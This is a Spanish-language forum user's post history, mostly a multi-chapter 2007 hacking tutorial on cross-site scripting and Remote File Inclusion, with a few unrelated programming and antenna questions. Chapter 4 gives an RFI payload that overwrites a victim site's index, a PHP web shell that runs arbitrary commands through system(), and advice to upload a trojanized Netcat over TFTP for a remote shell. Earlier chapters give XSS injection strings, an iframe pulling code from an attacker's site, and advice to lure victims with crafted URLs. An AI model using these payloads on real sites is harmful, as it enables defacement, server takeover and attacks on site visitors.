Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - zhynar_X

#81
Hola, el caso es que como se mucho mas de C que de Visual Basic he hecho una DLL para usarla en vb, pero mi problema es que no se como se incluyen las dll en proyectos de vb .NET. Espero que me lo podais decir.

Uso el Microsoft Visual Basic 2005 Expres Edition.


Saludos
#82
PHP / Subir archivos
9 Agosto 2007, 18:00 PM
Hola, Como puedo hacer para subir archivos desde mi web al servidor?  no se si sabeis a lo que me refiero, algo para subir archivos a mi servidor desde una interfaz web.

Y tambien, como puedo hacer un boton de esos que pone "buscar" y que salga una ventana para que el usuario busque el archivo que quiere subir?


Saludos 
#83
Hola, como puedo pasar comandos a la shell en Visual Basic .NET??


Saludos
#84
Hola de nuevo, siento haber tardado tanto en poner este capitulo ya que estoy sin internet. Hoy veremos como conseguir una shell remota mediante la Vulnerabilidad RFI y también veremos la respuesta al ejercicio del capitulo anterior.



Capitulo 4: Remote File Inclusion


Como modificar un archivo mediante un FRI:     ¡No seais lammers y no os deifiquéis a destruir servidores que no son vuestros
No es nada complicado, ya que lo único que hay que saber es manejar archivos con php. Utilizaremos el ejemplo del anterior capitulo:

Código (php) [Seleccionar]

<?php

$var 
$_GET["cont"];
include(
$var);

?>



Solo tendríamos que crear un archivo que cambie el contenido de index.html, subirlo a un servidor web y incluirlo dentro de la web vulnerable. El archivo que modifica el index podría ser algo así:

vuln.txt (como ya vimos no podemos usar extensión .php):
Código (php) [Seleccionar]

<?php

$a 
fopen("index.php","w");
$b "<center><h1>Vulnerable a XSS</h1></center>";
fwite($a,$b);

?>



Para incluirlo solo tendríamos que hacer así:

http://www.webvulnerable.com/rfi.php?cont=http://www.nuestrositio.net/vuln.txt


Como podéis comprobar esto es muy fácil, ahora veremos como obtener una shell remota a traves de esta Vulnerabilidad.


Para usar comandos de la shell se usan las funciones system(); y exec(); (muchas webs los tienen desactivados por seguridad), por ejemplo si la web esta bajo una plataforma windows podríamos usar este código para ver el contenido de una carpeta con nombre "datos" dentro del server:

code.txt
Código (php) [Seleccionar]

<?php

system
("cd datos");
$a system("dir");

echo 
$a;

?>



Como veis es muy fácil solo hay que saber usar la shell de cada plataforma.Yo solo se usar la de windows, aunque es preferible saber usar la de linux, ya que la gran mayoría de servers se usan bajo una plataforma linux. Aquí os dejos algunos comandos de cada una:


-Para windows os dejo mi totoral de programacion BATCH, donde se explican bastantes comandos de la shell de windows: http://foro.elhacker.net/index.php/topic,167525.0.html

-Para linux pondré una lista de los comandos mas básicos sacada de un totoral de FRI que leí hecho por n3c0:

Comandos útiles:


tar -cf backup.tar directorio --->Respaldar un directorio
CD ---> Comando que nos permite saltar de un directorio a otro
LS ---> Comando que nos permitira obtener un listado de los archivos del directorio
CAT ---> Sirve para visualizar la estructura y codigo de un archivo
WGET URL ---> Comando para tranferir (subir) archivos
curl -O url ---> Comando para tranferir (subir) archivos -opcion 2-
RM archivo---> Sirve para eliminar archivos
MKDIR directorio ---> Con esto creamos un directorio
TOUCH ---> Creamos un archivo
CP ---> Copiar
./archivo ---> Ejecutar


Aquí les dejo también un programa en php que acabo de crear para enviar comandos a la consola:

Código (html4strict) [Seleccionar]

<html>
<head>
<title>Shell en php         by Zhynar X</title>
</head>
<body>


<form action="cmd.php" method=post>
<center>
<h1>Consola de comandos en php</h1>

<h2>By Zhynar X</h2>
<br><br>
</center>
    Comando: <input type=text name="cmd">
<br><br>
    <input type=submit value="Enviar">
<br><br>
Respuesta del comando:<br>
<textarea cols="80" rows="30">
<?php

$com 
$_POST["cmd"];

if (! 
$com) {
echo 
"No se ha escrito ningun comando";
} else {
$res system($com);
echo 
$res;
}

?>

</textarea>
</body>
</html>


Creo que este codigo es facil de comprender, si no lo comprendeis lo explicare brebemente. El formulario envia el comando a esta misma pagina, que se llama "cmd.php".Se mira si tiene algo escrito, si lo tiene ejecuta el comando y escribe en la pantalla el resultado que se obtiene, si no hay nada escrito en el comando simplemente escribe que no has escrito ningun comando.

Seguramente muchos preferiran una consola normal antes que este programa, pues solo tendriamos que subir el Netcat troyanizado mediante TFTP, ejecutarlo y ya tenemos nuestra shell. Les dejo tutoriales de troyanizar el Netcat y de como usar TFTP:

-Jugando con Nc por WHK---->http://foro.elhacker.net/index.php/topic,159799.0.html

-Guia de hacking (aqui explica muchas mas cosas aparte de el uso de TFTP) por zhyzura---->http://foro.elhacker.net/index.php/topic,113046.0.html


Creo que ya he explicado lo suficiente sobre RFI, el proximo capitulo tratara sobre SQL injection. Tardaré bastante en publicar el siguiente capítulo por que como he dicho antes no tengo internet.


Saludos!






#85
Materiales y equipos / Re: Antenas Caseras
5 Agosto 2007, 09:58 AM
tienda de chinos no tengo ninguna cerca, pero si estoy rodeado de obras asi que mirare haber si tengo suerte.


Saludos
#86
Materiales y equipos / Re: Antenas Caseras
4 Agosto 2007, 23:01 PM
CodMane, tengo un pregunta sobre tu antena. Como no se donde conseguir la copa de brasero, se podria hacer que funcione con la misma forma pero de carton rodeado de papela albal??


Saludos
#87
Hola, me he dado cuena de que en el foro de programación C/C++ han quitado las chinchetas a todos los que la tenian menos al de las normas. Solo por curiosidad, porque se las han quitado?


Saludos
#88
Capítulo 3: Introduccion a Remote File Inclusion.


Hola, hoy vais a aprender a explotar la vulnerabilidad Remote File Inclusion (RFI), esta vulnerabilidad no afecta solamente a la seguridad de los usuarios sino también la del servidor ya que nos permite modificar archivos de la pagina, pero antes pondré la solución al ejercicio del capítulo anterior, se que era demasiado fácil pero tengo muy poca imanación xD.


Como ya he dicho antes no tenia ninguna dificultad. La web decía que el código que habías escrito era invisible, es cierto, el código estaba dentro de una caja de texto de tipo hidden, así:

Código (html4strict) [Seleccionar]

<form>
Lo que has escrito no se puede ver... <input type="hidden" value="texto escrito">
</form>


Ahora solo tenemos que cerrar la caja de texto "invisible" y el texto quedara fuera de ella. Antes de pasar al RFI quiero decir una cosa sobre el XSS que se me olvido decir en el anterior capitulo.

En algunas webs, sobretodo en foros y libros de visitas, no se permite usar la etiqueta <script></script> pero podemos hacer el uso de otras etiquetas para incluir código, como la etiqueta <iframe> que permite contener otra web dentro de ella. Podemos hacer un código como este:

Código (html4strict) [Seleccionar]

<iframe src="http://www.miweb.com/codigomalicioso.html"></iframe>


Ahora que ya sabemos lo mas básico sobre XSS pasaremos a aprender a explotar la vulnerabilidad RFI. Estos son los materiales y conocimientos necesarios:


1- Esta vez si necesitaremos un servidor web con php.
2- Es lógico que también es necesario saber php.
3- Y por supuesto también hay que tener ganas de aprender.


Esto es todo, empecemos!   Esta vulnerabilidad como su nombre indica se trata de incluir archivos remotos en documentos hechos en php. La función "include();" de php permite incluir archivos dentro del mismo documento como si fuesen parte del texto, esta función se puede usar de dos formas:



Forma 1----> include("web.html");  Así el documento no seria vulnerable porque no permite cambiar el archivo a incluir.

Forma 2----> include($variable);   Esta es la forma vulnerable, ya que podemos modificar la variable mediante la URL.



Esta vulnerabilidad se suele encontrar en webs que usan esta función en los enlaces. Por ejemplo imaginemos una web que muestra un la publicidad, el logo, la parte donde se muestra el contenido principal y un menú. En el menú hay enlaces para moverse por el interior de la web, pero estos enlaces no llevan a otra web lo que hacen es que cambian el valor de la variable de "include($var);", nosotros podemos modificar ese valor como queramos y incluir dentro un documento con el código que queramos.

Si tenéis server web con php instalado usar este código para hacer pruebas (no puedo subir el codigo a la web de pruebas porque mediante esta vulnerabilidad podríais borrar los demás ejemplos o incluir algún código malicioso)

Código de index.html
Código (html4strict) [Seleccionar]

<HTML>
<HEAD>
<TITLE> Prueva de RFI </TITLE>
</HEAD>
<BODY>

<A HREF="rfi.php?cont=hola.html">Hola!</A>
<BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>

</BODY>
</HTML>

No pondre el codigo de "hola.html" ni el de "adios.html" porque puede ser cualquier tonteria sin inportancia.

Codigo de rfi.php
Código (php) [Seleccionar]

<?php

$var 
$_GET["cont"];
include(
$var);

?>



Ahora si queremos incluir un archivo solo tenemos que hacer:

http://www.webvuln.es/fri.php?cont=http://www.miweb.com/code.txt


Tehabras dado cuenta que hemos incluido un archivo .txt, eso es porque si incluimos un archivo .php se ejecutaria en el server onde esta el archivo y no en el de la web vulnerable, así que podríamos incluir un archivo de esta formaí:

code.txt:
Código (php) [Seleccionar]

<?php
echo "<h1>Vulnerable a RFI</h1>";
?>



Aquí acabamos por hoy, en el próximo capitulo veremos como crear una shell remota con esta vulnerabilidad. Ejercicio:

Ya he dicho antes que no podía subir las pruebas de RFI, así que como ejercicio les dejo que intenten modificar el index de la prueba que hemos hecho antes aprovechandose del la Vulnerabilidad. En el siguiente capitulo os dire la respuesta.


Saludos y hasta la proxima!


#89
Hola, este capitulo lo he acabado antes de los dos días que dije, así que para que esperar...


Capítulo 2: Cross Site Scripting.

En este capitulo seguiremos con el XSS, pero antes de nada explicaré la solución al ejercicio que puede en el anterior capítulo sobre inyectar código dentro de una caja de texto.

Respuesta al ejercicio 1:

El ejercicio no era tan difícil, solo había que pensar un poco en el código de los formularios para poner una caja de texto:


<INPUT TYPE="text" VALUE="<?php echo $var ?>">


Ya nos habremos dado cuenta de que el código se inserta dentro de la propiedad VALUE=" ", así que para explotar la vulnerabilidad de este modo solo tendríamos que cerrar la propiedad VALUE y la etiqueta, ¿¡COMO!? Muy simple, fijaros en este código (El color azul representa el código que ya estaba y el rojo el inyectado):

Citar

<INPUT TYPE="text" VALUE=""><SCRIPT>alert(5);</SCRIPT>">


Al principio del código inyectado pone ">, esto hace que cierre el atributo VALUE y la etiqueta, así todo lo que escribamos detrás quedara fuera de la caja de texto. Espero que todos lo hayáis entendido bien, como supongo que es así seguiremos con el tema de XSS.




Antes explicamos la inyección XSS por medio de formularios, ahora explicara como inyectar código por medio de la URL.

Esto es realmente sencillo, consiste en modificar las variables que se envia mediante GET a otra pagina y si la otra pagina los escribe por pantalla ya tenemos la vulnerabilidad. Miren este ejemplo:

Pagina index.html:
Código (html4strict) [Seleccionar]

<HTML>
<HEAD>
<TITLE>Practica XSS</TITLE>
</HEAD>

<BODY>

<A HREF="xss.php?var=hola">HOLA</A>
<BR><BR>
<A HREF="xss.php?var=adios">ADIOS</A>

</BODY>
</HTML>


Codigo de xss.php:
Código (php) [Seleccionar]

<?php

$bug 
$_GET["var"];
echo 
"Has escrito: ".$bug;

?>



Aqui esta la URL donde esta este programa: http://tallervulneravilidades.iespana.es/xssa

En este código no hay ningún formulario para inyectar texto, pero si que le pasa variables atraves de la URL, así que podemos modificar esta variable y poner lo que queramos. Con la URL maliciosa solo hace falta un poco de ingeniería social para enviarsela a alguien, entre y se ejecute el código en su navegador. Quedaria algo asi:


http://www.webvuln.es/xss.php?var=lo que queramos


Hay muchos métodos para inyectar código en una aplicaron web, por ejemplo es muy común poner programas en flash que contienen scripts o también es bastante común hacer lo mismo pero con vídeos. Otra forma de conseguir inyectar código es mediante las cookies, antes que nada definiré que es una cookie.

-Cookie: Una cookie no es mas que un fragmento de texto que contiene información. Cuando nos registramos en alguna web el servidor le envía una cookie al navegador que contiene nuestro loggin, el navegador la guarda en nuestro disco duro y así cuando entramos nos loggeamos estomáticamente.

Ahora que ya sabemos lo que es una cookie explicaré como inyectar codigo mediante ellas, este método es mas complicado pero bueno... Imaginemos un libro de visitas como el fotolog (una pena que fotolog no sea vulnerable xD), cuando escribimos un mensaje el navegador envía a nuestro pc una cookie con nuestro nombre y así la próxima vez que enviemos un comentario carga la cookie y escribe estomáticamente nuestro nombre de este modo:


echo "Comentario por: ".$user;

(user es el valor de la cookie)

Normalmente las webs no filtran el código recibido a través de las cookies así que solo tenemos que modificar la cookie y envez de nuestro nombre poner el código que queramos que se ejecute.


Esto va a todos los webmasters: Si tenéis alguna web y encontráis una vulnerabilidad de XSS NO hagáis como muchos otros y dejéis de darle inportancia ya que eso compromete la seguridad de vuestros usuarios y visitantes. Para filtrar un ataque de XSS busquen por google algún filtro, aquí tienen un manual para evitar estos ataques http://foro.elhacker.net/index.php/topic,45693.0.html.

Antes de acabar les pondre un ejercico. Consiste en explotar la Vulnerabilidad de XSS, es muy facil:
http://tallervulneravilidades.iespana.es/xssb



Aqui acaba el capitulo de hoy y también acabamos con el XSS, en el próximo capitulo empezaremos con el RFI o Remote File Inclusion.

Saludos!


#90
Intentare mejorarla, gracias por vuestras opiniones.


Saludos